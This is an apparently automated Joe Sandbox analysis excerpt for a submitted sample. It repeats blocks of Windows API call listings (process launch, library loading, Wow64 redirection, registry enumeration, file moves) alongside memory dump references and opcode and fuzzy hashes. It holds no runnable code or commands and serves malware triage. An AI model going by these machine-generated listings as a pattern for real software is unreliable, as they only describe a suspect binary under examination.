                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 76bd6cb15ac26c14d24cf2007d67f299e12dd1349acc256190ef7d50ea488552
                                                      • Instruction ID: 640e69d8d407b9372ea40d2fd44ab870e39531d94c4becdc936efd42b79bb1fa
                                                      • Opcode Fuzzy Hash: 76bd6cb15ac26c14d24cf2007d67f299e12dd1349acc256190ef7d50ea488552
                                                      • Instruction Fuzzy Hash: 8DE0E576004109BBEB015FA6ED4C90BBF79FF49B22B508321F26591071CB329420EFA0
                                                      APIs
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F8C6EE
                                                      • _wcslen.LIBCMT ref: 00F8C735
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F8C79C
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F8C7CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                      • String ID: 0
                                                      • API String ID: 1227352736-4108050209
                                                      • Opcode ID: c5b6c5f598c80964dc121b972b7a16950f5c0dbac3b6b19946fef5de197ea13b
                                                      • Instruction ID: 153aed76e5bb88c44c1cafb1ccb0530d00d8db43b5e030c3be2befd566f76a22
                                                      • Opcode Fuzzy Hash: c5b6c5f598c80964dc121b972b7a16950f5c0dbac3b6b19946fef5de197ea13b
                                                      • Instruction Fuzzy Hash: 7D51B171A143019BD714AF28CC85BAF77E8AF49320F040A29FA95D31A1DB74D944FBE2
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00FAAEA3
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                      • GetProcessId.KERNEL32(00000000), ref: 00FAAF38
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAAF67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 146682121-1426351568
                                                      • Opcode ID: 9a89b4107aa4efde64f4e8993ff29d68dd89ad2ddab89ed64ec8c37941cf7431
                                                      • Instruction ID: bacecbda88fd3974c8b0cf4b4bf16525b1b5dd1cf050f334cc7994de1c8bde66
                                                      • Opcode Fuzzy Hash: 9a89b4107aa4efde64f4e8993ff29d68dd89ad2ddab89ed64ec8c37941cf7431
                                                      • Instruction Fuzzy Hash: 4371ACB1A00628DFCB14EF54D885A9EBBF0FF09310F048499E816AB352C778ED45EB91
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F87206
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F8723C
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F8724D
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F872CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 1f16bc7c4c16666601a7f6f499172ae42b6b256b861f591dff6336a08b926586
                                                      • Instruction ID: 8784e8c4709a4ba42e77b556f673d590499fb18c26b4a325a960dd2f4d049ca8
                                                      • Opcode Fuzzy Hash: 1f16bc7c4c16666601a7f6f499172ae42b6b256b861f591dff6336a08b926586
                                                      • Instruction Fuzzy Hash: D7416171A04308EFDB15EF54C884BDA7BA9EF84310F2480A9BD059F25AD7B5D944EFA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FB2F8D
                                                      • LoadLibraryW.KERNEL32(?), ref: 00FB2F94
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FB2FA9
                                                      • DestroyWindow.USER32(?), ref: 00FB2FB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                      • String ID: SysAnimate32
                                                      • API String ID: 3529120543-1011021900
                                                      • Opcode ID: ce884f1c3b4f4d8b6f48d681895bb12e7486df31502eca9b5881ed872dbe3260
                                                      • Instruction ID: 4e1aa3f676828a7799c3bb51322137e1ed1e6af9def5059d6b3092b578ddd5ce
                                                      • Opcode Fuzzy Hash: ce884f1c3b4f4d8b6f48d681895bb12e7486df31502eca9b5881ed872dbe3260
                                                      • Instruction Fuzzy Hash: 81218872A00209ABEB509E66DC84EBB37B9EB59374F100218F950D61A0D771DC51BBA0
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F44D1E,00F528E9,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002), ref: 00F44D8D
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F44DA0
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00F44D1E,00F528E9,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002,00000000), ref: 00F44DC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 97ddecda3c36f76450b8b26f525654de72bc9bcf00c5e04bb9ee9e42b19cbb92
                                                      • Instruction ID: 2c1b31ce1e76aeb6a54389e2df078939a1e9ccda9af6f69750c83f472d78ffde
                                                      • Opcode Fuzzy Hash: 97ddecda3c36f76450b8b26f525654de72bc9bcf00c5e04bb9ee9e42b19cbb92
                                                      • Instruction Fuzzy Hash: 3BF0313594020CABDB159F94DC49B9EBFB5EF44751F040159FD05A2150CB749941EED1
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E9C
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F24EAE
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F24EDD,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24EC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-3689287502
                                                      • Opcode ID: 261f4c61ba628c6fbb3357949b0dd2ac622e9041f6495601ccb6d3e15c7c0113
                                                      • Instruction ID: 63070fe59ae6e8e305a8864317dc87e75dd59edf68b6eb6ae5401a34abef872a
                                                      • Opcode Fuzzy Hash: 261f4c61ba628c6fbb3357949b0dd2ac622e9041f6495601ccb6d3e15c7c0113
                                                      • Instruction Fuzzy Hash: C5E08635E02A325BA2311B29FC1CA5F7558AF81F727060215FC00E3200DBE0DD0268E1
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E62
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F24E74
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F63CDE,?,00FF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F24E87
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-1355242751
                                                      • Opcode ID: 89700fb15f60eba1921fff8f7eac37fe4e992fdb158560e636b9fe5b254d1818
                                                      • Instruction ID: 668b9a0eadb6c16cc761c2b7b8b84fd916b58c7c645015987da8d8bc85d2fb02
                                                      • Opcode Fuzzy Hash: 89700fb15f60eba1921fff8f7eac37fe4e992fdb158560e636b9fe5b254d1818
                                                      • Instruction Fuzzy Hash: 11D01235902A32576A221B29BC1CD8F7A18AF85B653064615F905B7124CFA0DD02B9E1
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 00FAA427
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FAA435
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FAA468
                                                      • CloseHandle.KERNEL32(?), ref: 00FAA63D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: 7c3cd127402baa294107407f128c3c7988a48f465daf7ecd7053a47004726466
                                                      • Instruction ID: 0e58a1250b2cf1aea104e67fc4be2922ae76728edb073f2b09a592913f0f71e9
                                                      • Opcode Fuzzy Hash: 7c3cd127402baa294107407f128c3c7988a48f465daf7ecd7053a47004726466
                                                      • Instruction Fuzzy Hash: FCA1A1B16043009FD720DF24D886F2AB7E5AF88724F14881DF95A9B392DB74EC45DB92
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FC3700), ref: 00F5BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F5BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00FF1270,000000FF,?,0000003F,00000000,?), ref: 00F5BC36
                                                      • _free.LIBCMT ref: 00F5BB7F
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: e67ec75648d556147230dcbd9594b147e77b1142f3758e2c4cb0b0754033558c
                                                      • Instruction ID: fc7cfc09bf23fc825c4eda0b1e9f10def3b2e54edf5d86182f82a8bbea67b266
                                                      • Opcode Fuzzy Hash: e67ec75648d556147230dcbd9594b147e77b1142f3758e2c4cb0b0754033558c
                                                      • Instruction Fuzzy Hash: 7851E971D0020DEFC710DFA59C859BAB7BCBF41321B10026AEA50E71A1EB705D49FB90
                                                      APIs
                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F8CF22,?), ref: 00F8DDFD
                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F8CF22,?), ref: 00F8DE16
                                                        • Part of subcall function 00F8E199: GetFileAttributesW.KERNEL32(?,00F8CF95), ref: 00F8E19A
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00F8E473
                                                      • MoveFileW.KERNEL32(?,?), ref: 00F8E4AC
                                                      • _wcslen.LIBCMT ref: 00F8E5EB
                                                      • _wcslen.LIBCMT ref: 00F8E603
                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F8E650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3183298772-0
                                                      • Opcode ID: 26f2c23c8d5095f12b671739697d6c793c5b11927bbc1eb2eea76891b2471720
                                                      • Instruction ID: b6d45496ffe48e2cbe7ce93890853d608bc7bfd1b52aa8e97b8ba7a4a4c41326
                                                      • Opcode Fuzzy Hash: 26f2c23c8d5095f12b671739697d6c793c5b11927bbc1eb2eea76891b2471720
                                                      • Instruction Fuzzy Hash: 045184B24083455BC724EBA0DC819DF77DCAF84350F00492EF589D3191EF78E6889B66
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00FAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FAB6AE,?,?), ref: 00FAC9B5
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FAC9F1
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA68
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FABAA5
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FABB00
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FABB63
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00FABBA6
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FABBB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 826366716-0
                                                      • Opcode ID: 2ac0f7005fc7fdad2f75c4dd0f02459bca799c66dc0cdac47894eab769934b86
                                                      • Instruction ID: d0e9fd7fa9c5ab0c895db97988f01c9a5857f33f5dd2d699f8f58f6857ec79fb
                                                      • Opcode Fuzzy Hash: 2ac0f7005fc7fdad2f75c4dd0f02459bca799c66dc0cdac47894eab769934b86
                                                      • Instruction Fuzzy Hash: 3D61C171608241AFC314DF24C890E2ABBE5FF85358F54855CF4998B2A2CB35ED45EBA2
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00F88BCD
                                                      • VariantClear.OLEAUT32 ref: 00F88C3E
                                                      • VariantClear.OLEAUT32 ref: 00F88C9D
                                                      • VariantClear.OLEAUT32(?), ref: 00F88D10
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F88D3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: 4ba36229fdd930fbb8389a582a61975f56a69febffb335945cbf266d5ff25487
                                                      • Instruction ID: 4780f69a7bd39e0621084f237d4583e9d8a42d95c228a295caac999beb53e5ee
                                                      • Opcode Fuzzy Hash: 4ba36229fdd930fbb8389a582a61975f56a69febffb335945cbf266d5ff25487
                                                      • Instruction Fuzzy Hash: 235158B5A00219EFCB14DF68C894AAAB7F8FF89350B158559E909DB354E730E912CF90
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F98BAE
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F98BDA
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F98C32
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F98C57
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F98C5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: 55ff5da589cdd664130c1fd10e8d3f773c234248b8c9c1d991328c716e205c3c
                                                      • Instruction ID: 4080d310a3327bb2bc81603ad83bc332bf0ca988b70e3bf11c82ab0f2612d90e
                                                      • Opcode Fuzzy Hash: 55ff5da589cdd664130c1fd10e8d3f773c234248b8c9c1d991328c716e205c3c
                                                      • Instruction Fuzzy Hash: AC514935A002199FDF14DF64C881A6EBBF5FF49314F088058E849AB362CB35ED41EBA0
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00FA8F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FA8FD0
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FA8FEC
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FA9032
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FA9052
                                                        • Part of subcall function 00F3F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F91043,?,7529E610), ref: 00F3F6E6
                                                        • Part of subcall function 00F3F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F7FA64,00000000,00000000,?,?,00F91043,?,7529E610,?,00F7FA64), ref: 00F3F70D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                      • String ID:
                                                      • API String ID: 666041331-0
                                                      • Opcode ID: 12d340356d65b1dbdbf8a8e598606d9fa73794e87d1cc73146446354c3fe2e99
                                                      • Instruction ID: 3165d1efeaf814a4066e0ea4b0fe2f5adc21d36f9154a4d60118977499a59138
                                                      • Opcode Fuzzy Hash: 12d340356d65b1dbdbf8a8e598606d9fa73794e87d1cc73146446354c3fe2e99
                                                      • Instruction Fuzzy Hash: C8514C75A04215DFC710DF68C4858ADBBB1FF49364F0880A9E805AB362DB75ED86EF90
                                                      APIs
                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FB6C33
                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00FB6C4A
                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FB6C73
                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F9AB79,00000000,00000000), ref: 00FB6C98
